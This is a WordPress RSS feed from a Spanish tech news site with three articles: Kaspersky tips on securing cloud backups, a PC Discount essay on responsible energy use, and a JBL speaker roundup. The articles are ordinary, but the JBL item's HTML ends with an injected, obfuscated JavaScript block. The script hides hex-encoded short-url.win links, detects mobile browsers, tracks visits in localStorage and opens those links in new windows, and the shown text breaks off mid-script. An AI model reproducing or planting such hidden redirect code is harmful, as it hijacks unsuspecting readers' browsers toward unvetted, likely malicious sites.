<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>dispositivos &#8211; Todo en un click</title>
	<atom:link href="https://www.todoenunclick.com/tag/dispositivos/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.todoenunclick.com</link>
	<description>Magazine Digital de Noticias</description>
	<lastBuildDate>Tue, 26 Aug 2025 18:40:59 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	
<site xmlns="com-wordpress:feed-additions:1">74029197</site>	<item>
		<title>Tres de cada cuatro latinoamericanos usan la nube, pero el 21% no sabe cómo proteger sus datos</title>
		<link>https://www.todoenunclick.com/tres-de-cada-cuatro-latinoamericanos-usan-la-nube-pero-el-21-no-sabe-como-proteger-sus-datos/</link>
		
		<dc:creator><![CDATA[Redacción Todo en un click]]></dc:creator>
		<pubDate>Tue, 26 Aug 2025 18:40:54 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[Almacenamiento]]></category>
		<category><![CDATA[dispositivos]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<category><![CDATA[nube]]></category>
		<category><![CDATA[proteger datos]]></category>
		<category><![CDATA[seguridad]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=101004</guid>

					<description><![CDATA[<p><img width="904" height="612" src="https://www.todoenunclick.com/wp-content/uploads/2025/08/BackUp-y-Nube.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/08/BackUp-y-Nube.jpg?w=904&amp;ssl=1 904w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/08/BackUp-y-Nube.jpg?resize=236%2C160&amp;ssl=1 236w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/08/BackUp-y-Nube.jpg?resize=496%2C336&amp;ssl=1 496w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/08/BackUp-y-Nube.jpg?resize=768%2C520&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/08/BackUp-y-Nube.jpg?resize=620%2C420&amp;ssl=1 620w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/08/BackUp-y-Nube.jpg?resize=640%2C433&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/08/BackUp-y-Nube.jpg?resize=681%2C461&amp;ssl=1 681w" sizes="(max-width: 904px) 100vw, 904px" /></p><!-- wp:paragraph -->
<p>Muchos usuarios aún desconocen cómo proteger sus respaldos en la nube, lo que los expone a ciberamenazas. Los expertos de Kaspersky comparten recomendaciones clave para evitarlo.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Cada vez más personas confían en la nube para guardar datos importantes y copias de seguridad de lo que almacenan en sus dispositivos. Sin embargo, la protección de esta información sigue siendo una tarea pendiente para los usuarios. De acuerdo con <a href="https://latam.kaspersky.com/blog/el-70-de-la-poblacion-en-america-latina-ya-cuenta-con-conexion-a-internet/16991/">un estudio de Kaspersky</a>, el 21% de los latinoamericanos no protege sus datos en la nube porque no sabe cómo hacerlo, mientras que un 22% ni siquiera sabía que era necesario.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Usualmente, los servicios en la nube ofrecen ventajas como el acceso remoto y el cifrado de datos, lo que facilita la recuperación de archivos en caso de pérdida o daño de un dispositivo. Esto ha llevado a que hacer respaldos en la nube sea una práctica común entre las personas como medida preventiva. Según la investigación de Kaspersky, tres de cada cuatro los latinoamericanos almacena en la nube archivos de su smartphone, como fotos, contactos y chats, confiando en esta tecnología para proteger su información.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>No obstante, esta práctica también conlleva riesgos si no se toman medidas de seguridad. Sin una protección adecuada, los respaldos en la nube pueden quedar expuestos a ciberataques, accesos no autorizados o incluso a la pérdida definitiva de los datos. Lo que es aún más preocupante es que los usuarios tienden a almacenar información sensible en la nube creyendo que está completamente segura. De hecho, el 29% de los latinoamericanos guardaría fotos íntimas en estos servicios, confiando en que una contraseña basta para mantenerlas a salvo. Así lo revela el 34% de los argentinos, el 31% de brasileros y mexicanos, 29% de colombianos, 25% de chilenos y 23% de peruanos.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Esta cifra evidencia la falta de consciencia sobre los riesgos que enfrenta la información almacenada en la nube si no está protegida. Por ejemplo, los ciberdelincuentes pueden obtener acceso a las copias de seguridad mediante el robo de contraseñas débiles, correos fraudulentos o la explotación de vulnerabilidades en los dispositivos.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>“La adopción de servicios en la nube ha crecido significativamente en América Latina, impulsada por su practicidad y accesibilidad. No obstante, esta tendencia también ha puesto en evidencia una desconexión preocupante: muchas personas utilizan estos servicios sin comprender del todo los riesgos asociados ni las responsabilidades que implica su uso. Confiar en la nube sin tomar precauciones mínimas puede generar una falsa sensación de seguridad. Es fundamental que, así como se avanza en la digitalización del almacenamiento, también se fortalezca la conciencia sobre la protección de los datos. Incorporar hábitos de seguridad digital no debe verse como una opción técnica, sino como parte de una cultura preventiva necesaria en el entorno actual”, </em><strong>aseguró Carolina Mojica, Gerente de Productos para el Consumidor para NOLA y SOLA en Kaspersky.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Con el fin de evitar vulnerabilidades, los expertos de Kaspersky comparten algunas recomendaciones para hacer copias de seguridad en la nube y protegerlas:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Verifica la seguridad del servicio de almacenamiento en la nube</strong>: Antes de respaldar tus archivos, asegúrate de que el servicio que utilizas ofrece cifrado para proteger la información. Así, aunque alguien acceda a tus archivos, no podrá verlos. Revisa que la conexión entre tus dispositivos y la nube sea segura para evitar que tus datos sean interceptados.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Protege tu cuenta en la nube:</strong> Usa una contraseña fuerte, evita repetir credenciales que usas para otras cuentas y activa la autenticación de dos pasos (2FA) para prevenir accesos no autorizados.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Revisa y elimina archivos innecesarios regularmente:</strong> Borra información sensible que ya no necesitas y verifica periódicamente qué datos sigues almacenando en la nube para reducir riesgos.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Realiza copias de seguridad en varias ubicaciones:</strong> No dependas solo de la nube. Mantén copias adicionales en discos duros externos, USB o en una red privada segura, sobre todo para aquella información más importante.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Utiliza una solución de seguridad.</strong> <a href="https://latam.kaspersky.com/premium">Kaspersky Premium</a>, por ejemplo, te permite seleccionar los archivos que deseas respaldar y ofrece opciones para almacenar la copia de seguridad de manera automática y cifrada. Además, protege tus dispositivos contra malware, phishing y otras amenazas que podrían comprometer tus copias de seguridad en la nube.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->
<p><a href="https://www.todoenunclick.com/tres-de-cada-cuatro-latinoamericanos-usan-la-nube-pero-el-21-no-sabe-como-proteger-sus-datos/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">101004</post-id>	</item>
		<item>
		<title>Consumo tecnológico: cómo hacerlo más responsable</title>
		<link>https://www.todoenunclick.com/consumo-tecnologico-como-hacerlo-mas-responsable/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Thu, 20 Feb 2025 18:58:52 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[Ahorro]]></category>
		<category><![CDATA[CO2]]></category>
		<category><![CDATA[Consumo]]></category>
		<category><![CDATA[dispositivos]]></category>
		<category><![CDATA[eficiencia]]></category>
		<category><![CDATA[energía]]></category>
		<category><![CDATA[Pc Discount]]></category>
		<category><![CDATA[reacondicionado]]></category>
		<category><![CDATA[reciclaje]]></category>
		<category><![CDATA[Sostenibilidad]]></category>
		<category><![CDATA[tecnología]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=100057</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2025/02/Consumo-tecnologico-como-hacerlo-mas-responsable.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Consumo tecnológico: cómo hacerlo más responsable" decoding="async" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/02/Consumo-tecnologico-como-hacerlo-mas-responsable.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/02/Consumo-tecnologico-como-hacerlo-mas-responsable.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/02/Consumo-tecnologico-como-hacerlo-mas-responsable.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/02/Consumo-tecnologico-como-hacerlo-mas-responsable.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/02/Consumo-tecnologico-como-hacerlo-mas-responsable.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/02/Consumo-tecnologico-como-hacerlo-mas-responsable.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/02/Consumo-tecnologico-como-hacerlo-mas-responsable.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="(max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>El 14 de febrero, se conmemoró el Día Mundial de la Energía, es imperativo reflexionar sobre cómo nuestras prácticas cotidianas, especialmente en el ámbito tecnológico, impactan en el consumo energético y, por ende, en el medio ambiente. </p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>La tecnología, sin duda, facilita nuestras vidas, pero también nos impone la responsabilidad de utilizarla de manera consciente y sostenible.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Un aspecto frecuentemente subestimado es el consumo energético de los aparatos eléctricos y electrónicos (AEE) en mal estado o envejecidos. </p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Según datos de la Cámara Argentina de la Construcción, un aparato en mal estado puede consumir más energía de la necesaria, incrementando innecesariamente el gasto energético y las emisiones asociadas.&nbsp;</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En este contexto, el reacondicionamiento o "refurbished" de aparatos electrónicos emerge como una solución efectiva. Al prolongar la vida útil de equipos tecnológicos como celulares, computadoras y laptops, no sólo reducimos la generación de residuos electrónicos, sino que también evitamos las emisiones de CO? derivadas de la fabricación de nuevos dispositivos.&nbsp;</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En Argentina, las emisiones de CO? en 2023 fueron de 183,778 megatoneladas, lo que representa una disminución del 5,02% respecto al año anterior, lo que representa que Argentina es el país número 154 del ranking de países por emisiones de CO2, formado por 184 países, en el que se ordenan los países de menos a más contaminantes.&nbsp;</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em><strong>(*Fuente: <a href="https://datosmacro.expansion.com" target="_blank" rel="noreferrer noopener">https://datosmacro.expansion.com</a>)</strong></em></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Aunque este descenso es alentador, aún queda un largo camino por recorrer para alcanzar los objetivos de desarrollo sostenible (ODS) establecidos en la Agenda 2030 de las Naciones Unidas, especialmente el ODS 12, que promueve modalidades de consumo y producción sostenibles.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En Pc Discount asumimos el compromiso de impulsar el uso eficiente de la energía y fomentar un consumo tecnológico responsable.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Al ofrecer dispositivos reacondicionados estamos brindando a nuestros clientes la oportunidad de adquirir equipos de calidad, a precios convenientes y con garantía.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>De este modo, las empresas y los consumidores pueden optimizar su inversión a la vez que contribuyen activamente a la reducción de la huella de carbono.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Pc Discount promueve prácticas de consumo responsable con estos <strong>5</strong> <strong>consejos que todos podemos implementar en nuestra vida diaria y así avanzar hacia un consumo energético más eficiente:</strong></p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Desconectar dispositivos en desuso: Muchos aparatos continúan consumiendo energía en modo de espera. Desenchufarlos cuando no se utilizan puede reducir hasta un 10% del consumo eléctrico en el hogar. </li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Optar por equipos eficientes: Al reemplazar electrodomésticos, elija aquellos con etiquetas de eficiencia energética A+ o superiores. Estos modelos consumen menos energía y son más amigables con el medio ambiente. </li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Realizar mantenimiento regular: Mantener los equipos en buen estado garantiza un funcionamiento óptimo y evita consumos excesivos de energía.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Aprovechar la luz natural: Siempre que sea posible, utilice la iluminación natural para reducir el uso de luces artificiales.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Implementar hábitos de uso consciente: Apague las luces al salir de una habitación, utilice programas de bajo consumo en electrodomésticos y regule la temperatura de los aires acondicionados y los calefones, para optimizar el consumo energético. </li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>Al adoptar estas prácticas, no solo contribuimos a la conservación del medio ambiente, sino que también promovemos un uso más eficiente y responsable de la energía. </p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Juntos podemos transformar la manera en que consumimos tecnología y construir un futuro más sostenible.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>"Somos PC Discount. Como Nuevo, Pero Mejor."</em></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Por:</strong> <em>Alberto Esswein, Presidente de PC Discount.</em></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p></p>
<!-- /wp:paragraph -->
<p><a href="https://www.todoenunclick.com/consumo-tecnologico-como-hacerlo-mas-responsable/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">100057</post-id>	</item>
		<item>
		<title>JBL: La clave para disfrutar música en cualquier lugar</title>
		<link>https://www.todoenunclick.com/jbl-la-clave-para-disfrutar-musica-en-cualquier-lugar/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Thu, 21 Nov 2024 15:47:05 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[audio]]></category>
		<category><![CDATA[dispositivos]]></category>
		<category><![CDATA[JBL]]></category>
		<category><![CDATA[música]]></category>
		<category><![CDATA[tecnología]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=99672</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2024/11/JBL_Clip_5_Lifestyle.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="JBL: La clave para disfrutar música en cualquier lugar" decoding="async" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/11/JBL_Clip_5_Lifestyle.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/11/JBL_Clip_5_Lifestyle.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/11/JBL_Clip_5_Lifestyle.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/11/JBL_Clip_5_Lifestyle.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/11/JBL_Clip_5_Lifestyle.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/11/JBL_Clip_5_Lifestyle.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/11/JBL_Clip_5_Lifestyle.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="(max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>En el marco del <strong>Día Internacional de la Música</strong>, resulta fundamental resaltar el vínculo inquebrantable entre los argentinos y su amor por los sonidos. Según la <strong>Encuesta Nacional de Consumos Culturales (ENCC)</strong>, el 96% de los encuestados afirmó escuchar música en el último año, con el <strong>celular</strong> liderando como el dispositivo más utilizado, seguido por el televisor. Este dato refleja no solo la pasión de los argentinos, sino también su inclinación hacia plataformas digitales como <strong>YouTube</strong>, <strong>Spotify</strong> y <strong>TikTok</strong>, que dominan el panorama musical.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En este contexto, <strong>JBL</strong> se ha consolidado como un aliado esencial, ofreciendo dispositivos que transforman cada escucha en una experiencia única.</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":4} -->
<h4 class="wp-block-heading">Innovación al servicio del sonido</h4>
<!-- /wp:heading -->

<!-- wp:list {"ordered":true} -->
<ol class="wp-block-list"><!-- wp:list-item -->
<li><strong>JBL Authentics 300</strong>: Diseño vintage con tecnología moderna. Este parlante ofrece un sonido equilibrado gracias a sus tweeters de 25 mm, <strong>Wi-Fi integrado</strong> y hasta 8 horas de reproducción.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>JBL Clip 5</strong>: Portabilidad extrema con <strong>resistencia al agua y polvo (IP67)</strong>. Su <strong>mosquetón integrado</strong> lo convierte en el compañero ideal para aventuras al aire libre, proporcionando hasta 15 horas de música continua con <strong>Playtime Boost</strong>.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>JBL Tour One M2</strong>: Inmersión total con <strong>cancelación de ruido adaptativa</strong>. Estos auriculares inalámbricos aseguran hasta 50 horas de reproducción, ajustando el sonido en tiempo real para ofrecer una experiencia personalizada mediante la aplicación <strong>JBL Headphones</strong>.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>JBL Live Pro 2 TWS</strong>: Calidad premium con hasta 40 horas de reproducción. Su <strong>cancelación de ruido adaptativa</strong> y <strong>6 micrófonos</strong> aseguran llamadas nítidas y sin interferencias.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>JBL Charge 5</strong>: Un ícono de la potencia sonora con hasta 20 horas de autonomía y <strong>resistencia al agua y polvo (IP67)</strong>.</li>
<!-- /wp:list-item --></ol>
<!-- /wp:list -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">Tecnología para cada estilo</h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Desde la <strong>cumbia/reguetón</strong> hasta el <strong>rock nacional</strong>, los argentinos encuentran en los dispositivos de JBL la herramienta perfecta para disfrutar de sus géneros favoritos con calidad profesional. Cada producto está diseñado para maximizar la experiencia auditiva, ya sea en el hogar, en la calle o durante actividades al aire libre.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Los dispositivos de JBL están disponibles en su <a href="https://www.jbl.com.ar/"><strong>tienda online oficial</strong></a> y en la <strong>tienda física</strong> del Abasto Shopping, en Buenos Aires.</p>
<!-- /wp:paragraph -->
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new 